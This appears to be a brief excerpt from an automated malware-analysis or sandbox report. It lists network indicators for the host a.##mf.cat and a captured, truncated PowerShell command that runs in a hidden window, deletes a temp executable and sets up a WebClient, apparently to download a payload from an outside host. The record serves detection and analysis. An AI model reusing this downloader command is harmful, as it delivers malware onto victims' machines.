Technical Information
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile If (test-path $env:TEMP + '\tp.exe') {Remove-Item $env:TEMP + '\tp.exe'}; $why = New-Object System.Net.WebClient; $why.Headers['User-Agent'] = 'noobBoy'; $why.D...' (with hidden window)